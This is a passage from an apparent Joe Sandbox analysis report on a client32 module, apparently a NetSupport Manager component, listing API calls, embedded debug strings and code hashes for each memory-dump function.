                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: MessagePostThread$CloseFreeHandleLibraryObjectSingleSleepWait
                                                                                        • String ID:
                                                                                        • API String ID: 2375713580-0
                                                                                        • Opcode ID: 1167bbe8f404b4b170c5f303e961cdd6648e4dbde7aa15af3b93772e36ea41a8
                                                                                        • Instruction ID: 5d0aa2bc238e72ac38ea6d9656cf733a88b5b02fa80378034871cbc9b64e3e84
                                                                                        • Opcode Fuzzy Hash: 1167bbe8f404b4b170c5f303e961cdd6648e4dbde7aa15af3b93772e36ea41a8
                                                                                        • Instruction Fuzzy Hash: B1217C71A43735DBE612CBD8CCC4A76FBA8AB58B18B40013AF524C7288C770A441CF91
                                                                                        APIs
                                                                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,11040BBA,00000000), ref: 1113D7C5
                                                                                        • CreateThread.KERNEL32(00000000,00000000,1113D660,00000000,00000000,00000000), ref: 1113D7E0
                                                                                        • SetEvent.KERNEL32(00000000,?,?,11040BBA,00000000), ref: 1113D805
                                                                                        • WaitForSingleObject.KERNEL32(00000000,00001388,?,?,11040BBA,00000000), ref: 1113D816
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 1113D829
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 1113D83C
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CloseCreateEventHandle$ObjectSingleThreadWait
                                                                                        • String ID:
                                                                                        • API String ID: 414154005-0
                                                                                        • Opcode ID: 254c25c95f36225789ab582df44d250993c27ed63b68ed0c4c323ac941b1d095
                                                                                        • Instruction ID: 02350ad9304c652d5973a468123ac0969e3fb67a745117c4f7e49a1723ee0a3b
                                                                                        • Opcode Fuzzy Hash: 254c25c95f36225789ab582df44d250993c27ed63b68ed0c4c323ac941b1d095
                                                                                        • Instruction Fuzzy Hash: 9F11CE705C8265AAF7298BE5C9A8B95FFA4934631DF50402AF2389658CCBB02088CB54
                                                                                        APIs
                                                                                        • __getptd.LIBCMT ref: 111715AE
                                                                                          • Part of subcall function 1116C675: __getptd_noexit.LIBCMT ref: 1116C678
                                                                                          • Part of subcall function 1116C675: __amsg_exit.LIBCMT ref: 1116C685
                                                                                        • __amsg_exit.LIBCMT ref: 111715CE
                                                                                        • __lock.LIBCMT ref: 111715DE
                                                                                        • InterlockedDecrement.KERNEL32(?,111DD2D8,0000000C,111642B9,?,?,11174EF7), ref: 111715FB
                                                                                        • _free.LIBCMT ref: 1117160E
                                                                                        • InterlockedIncrement.KERNEL32(003418E0,111DD2D8,0000000C,111642B9,?,?,11174EF7), ref: 11171626
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                                                                        • String ID:
                                                                                        • API String ID: 3470314060-0
                                                                                        • Opcode ID: dad0e97e86b6fe847014ebdb1c65e5de67e018ea6a8123b1860c0bf04b02162f
                                                                                        • Instruction ID: 224c65a35f2b569fe2d6e63dca2a733826a481c10535b45dbfb9364d9a312d7f
                                                                                        • Opcode Fuzzy Hash: dad0e97e86b6fe847014ebdb1c65e5de67e018ea6a8123b1860c0bf04b02162f
                                                                                        • Instruction Fuzzy Hash: 3001C4369027229BEB029FA9858479DF761AB0271CF490015E820A7B84CB70A992DFD6
                                                                                        APIs
                                                                                        • SetEvent.KERNEL32(?,111F10F8,111E6C98,?,110B7A1E,00000000,_debug,TraceScrape,00000000,00000000,00000000,?), ref: 110B3578
                                                                                        • CloseHandle.KERNEL32(?), ref: 110B3585
                                                                                        • CloseHandle.KERNEL32(?), ref: 110B3598
                                                                                        • CloseHandle.KERNEL32(?), ref: 110B35A5
                                                                                        • WaitForSingleObject.KERNEL32(?,000003E8,111F10F8,111E6C98,?,110B7A1E,00000000,_debug,TraceScrape,00000000,00000000,00000000,?), ref: 110B35C3
                                                                                        • CloseHandle.KERNEL32(?), ref: 110B35D0
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CloseHandle$EventObjectSingleWait
                                                                                        • String ID:
                                                                                        • API String ID: 2857295742-0
                                                                                        • Opcode ID: 47e8cf337b2ce15499ba854ff78383ed598d3397d94da8483aa60cf9ecc16ddf
                                                                                        • Instruction ID: c91d849fc108652eb31eb37091e5d5d4b5a552e1f27565d093635cb0be7e85a1
                                                                                        • Opcode Fuzzy Hash: 47e8cf337b2ce15499ba854ff78383ed598d3397d94da8483aa60cf9ecc16ddf
                                                                                        • Instruction Fuzzy Hash: 96011A75A087049BD7909FB988D4A96F7DCEB54300F11492EE5AEC3200CB78B8448F60
                                                                                        APIs
                                                                                        • GetSystemMetrics.USER32(0000004C,?,?,75097D2F,?,11119DE6,?,00000000,?,1118B61B,00000002), ref: 1109599E
                                                                                        • GetSystemMetrics.USER32(0000004D,?,?,75097D2F,?,11119DE6,?,00000000,?,1118B61B,00000002), ref: 110959A7
                                                                                        • GetSystemMetrics.USER32(0000004E,?,?,75097D2F,?,11119DE6,?,00000000,?,1118B61B,00000002), ref: 110959AE
                                                                                        • GetSystemMetrics.USER32(00000000,?,?,75097D2F,?,11119DE6,?,00000000,?,1118B61B,00000002), ref: 110959B7
                                                                                        • GetSystemMetrics.USER32(0000004F,?,?,75097D2F,?,11119DE6,?,00000000,?,1118B61B,00000002), ref: 110959BD
                                                                                        • GetSystemMetrics.USER32(00000001,?,?,75097D2F,?,11119DE6,?,00000000,?,1118B61B,00000002), ref: 110959C5
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: MetricsSystem
                                                                                        • String ID:
                                                                                        • API String ID: 4116985748-0
                                                                                        • Opcode ID: 2acc5d47520048a17b19bc27345c05a5b6d72aca177766317273f5998d5a9f83
                                                                                        • Instruction ID: b65ab4a361e5326c91c4d36ade1d631f08c7cf5d252a1eb012e320adc1ee70d1
                                                                                        • Opcode Fuzzy Hash: 2acc5d47520048a17b19bc27345c05a5b6d72aca177766317273f5998d5a9f83
                                                                                        • Instruction Fuzzy Hash: 01F030B1B4131A6BE7009FAADC41B55BB98EB48664F008037A71C87680D6B5A8108FE4
                                                                                        APIs
                                                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104,0000045F,00000000,?,00000000), ref: 1103B75F
                                                                                          • Part of subcall function 110CC330: GetCurrentThreadId.KERNEL32 ref: 110CC339
                                                                                          • Part of subcall function 110CEEB0: CreateDialogParamA.USER32(00000000,?,1112E709,110CC170,00000000), ref: 110CEF41
                                                                                          • Part of subcall function 110CEEB0: GetLastError.KERNEL32 ref: 110CF099
                                                                                          • Part of subcall function 110CEEB0: wsprintfA.USER32 ref: 110CF0C8
                                                                                        • GetWindowTextA.USER32(?,?,000000C8), ref: 1103B81E
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CreateCurrentDialogErrorFileLastModuleNameParamTextThreadWindowwsprintf
                                                                                        • String ID: Survey$pcicl32.dll$toastImageAndText.png
                                                                                        • API String ID: 2477883239-2305317391
                                                                                        • Opcode ID: 2f90f4586e8a144a85dc65e248e3d6049d5ed08b354996f0881b37baed7ae7a3
                                                                                        • Instruction ID: a37ee32854b15c041e991ad0c80392c526a8d8f631297bf945f8db0117e793ba
                                                                                        • Opcode Fuzzy Hash: 2f90f4586e8a144a85dc65e248e3d6049d5ed08b354996f0881b37baed7ae7a3
                                                                                        • Instruction Fuzzy Hash: 3871E27590465A9FE709CF64C8D8FEAB7F5EB48308F1485A9D5198B381EB30E944CB50
                                                                                        APIs
                                                                                        • MapWindowPoints.USER32 ref: 110773FB
                                                                                          • Part of subcall function 11076740: DeferWindowPos.USER32(8B000EB5,00000000,BEE85BC0,33CD335E,?,00000000,33CD335E,11077496), ref: 11076783
                                                                                        • EqualRect.USER32 ref: 1107740C
                                                                                        • SetWindowPos.USER32(00000000,00000000,?,33CD335E,BEE85BC0,8B000EB5,00000014), ref: 11077466
                                                                                        Strings
                                                                                        • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11077442
                                                                                        • m_hWnd, xrefs: 11077447
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Window$DeferEqualPointsRect
                                                                                        • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                        • API String ID: 2754115966-2830328467
                                                                                        • Opcode ID: b6d19f504f75df2a93f1157cb60ab9b52a693478c141313c6b39b5393ddf6f55
                                                                                        • Instruction ID: 7762f9a6a2ed7d341f2943c2e7d232384b1531e6a197bbc7c1a3da1ffe608ad4
                                                                                        • Opcode Fuzzy Hash: b6d19f504f75df2a93f1157cb60ab9b52a693478c141313c6b39b5393ddf6f55
                                                                                        • Instruction Fuzzy Hash: 74414B74A006099FDB14CF98C885EAABBF5FF48704F108569EA55AB344DB70A800CFA4
                                                                                        APIs
                                                                                        • _malloc.LIBCMT ref: 1104971C
                                                                                        • _free.LIBCMT ref: 11049779
                                                                                          • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                          • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                          • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                          • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                        Strings
                                                                                        • idata->pSmartcardDevice == theSmartcardDevice, xrefs: 1104970D
                                                                                        • ReleaseSmartcardDevice called, xrefs: 110496BD
                                                                                        • CLTCONN.CPP, xrefs: 11049708
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ErrorExitLastMessageProcess_free_mallocwsprintf
                                                                                        • String ID: CLTCONN.CPP$ReleaseSmartcardDevice called$idata->pSmartcardDevice == theSmartcardDevice
                                                                                        • API String ID: 3300666597-3188990991
                                                                                        • Opcode ID: a96d33cc2ee08905e30f1eec18a566e6825b27c160358a4790fc3fe5e536e1e6
                                                                                        • Instruction ID: e35be207329a9a02e71ffc0183289b31f5ea9fbf546850573bb4cc18e029b419
                                                                                        • Opcode Fuzzy Hash: a96d33cc2ee08905e30f1eec18a566e6825b27c160358a4790fc3fe5e536e1e6
                                                                                        • Instruction Fuzzy Hash: D041AEB5A01611AFD704CF98D880EAAFBE4FB48328F6142BDE52997350E730A940CB95
                                                                                        APIs
                                                                                        • PostThreadMessageA.USER32(11027105,752BF08B,68575608,11199F9C), ref: 1109DBB6
                                                                                        • SendMessageA.USER32(00000000,752BF08B,68575608,11199F9C,000001F4,00000000,?,756F110C,?,11027105,?), ref: 1109DBEF
                                                                                          • Part of subcall function 1109DA70: IsWindow.USER32(?), ref: 1109DA8F
                                                                                          • Part of subcall function 1109DA70: GetClassNameA.USER32(?,?,00000040), ref: 1109DAA0
                                                                                          • Part of subcall function 1109DA70: FindWindowA.USER32 ref: 1109DAE1
                                                                                          • Part of subcall function 1109DA70: Sleep.KERNEL32(?,?,?,?,?,?,?,?,?,1109ED09,000001F4,00000006,?,11067720,0000048C,00000001), ref: 1109DAFC
                                                                                          • Part of subcall function 1109DA70: FindWindowA.USER32 ref: 1109DB0D
                                                                                        • PostMessageA.USER32 ref: 1109DC0B
                                                                                        Strings
                                                                                        • m_cds.cbData < m_pSharedHeader->dwDataLen - sizeof(IPCData), xrefs: 1109DB92
                                                                                        • ..\CTL32\ipc.cpp, xrefs: 1109DB8D
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: MessageWindow$FindPost$ClassNameSendSleepThread
                                                                                        • String ID: ..\CTL32\ipc.cpp$m_cds.cbData < m_pSharedHeader->dwDataLen - sizeof(IPCData)
                                                                                        • API String ID: 3524374798-1411620790
                                                                                        • Opcode ID: 42afa5bf68388e51984fb1ef34060e243bf26129c8e46c14fef31d973cacd0a3
                                                                                        • Instruction ID: f7862f93581c5bca8d7b47be27161d917c1b37376ee9b6c345dd63ee61fb1edc
                                                                                        • Opcode Fuzzy Hash: 42afa5bf68388e51984fb1ef34060e243bf26129c8e46c14fef31d973cacd0a3
                                                                                        • Instruction Fuzzy Hash: 0121737574060AEFD314CF59D990D6BF3E9FB88324B10852AE55A87A40D730FC50DB50
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: _strncpy$wsprintf
                                                                                        • String ID: %s (%s)
                                                                                        • API String ID: 2895084632-1363028141
                                                                                        • Opcode ID: 0030f36de6e69c1df68aa0c742c56456b93de146cc6c778061a393736ab38830
                                                                                        • Instruction ID: 0ad2666efbab1ef8cbc868768b6c2378956e4de7a80f96389552179b7afbf64e
                                                                                        • Opcode Fuzzy Hash: 0030f36de6e69c1df68aa0c742c56456b93de146cc6c778061a393736ab38830
                                                                                        • Instruction Fuzzy Hash: D731AF76900B02AFC324DF65C890EA3B7A9FF88318B04455DE64A8BE40E775F464CB90
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
